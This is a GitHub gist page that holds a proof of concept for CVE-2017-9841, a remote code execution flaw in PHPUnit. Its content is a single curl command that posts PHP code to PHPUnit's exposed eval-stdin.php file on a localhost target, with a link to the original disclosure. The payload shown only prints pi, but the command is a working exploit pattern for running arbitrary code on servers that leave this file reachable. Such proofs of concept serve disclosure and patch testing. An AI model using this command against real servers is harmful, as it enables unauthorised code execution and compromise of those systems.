Skip to content

Instantly share code, notes, and snippets.

@yassineaboukir
Created September 10, 2020 11:17
Show Gist options
  • Save yassineaboukir/1501de6f60dce148824d3001e83fb263 to your computer and use it in GitHub Desktop.
Save yassineaboukir/1501de6f60dce148824d3001e83fb263 to your computer and use it in GitHub Desktop.
PHPunit RCE PoC (CVE-2017-9841)
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment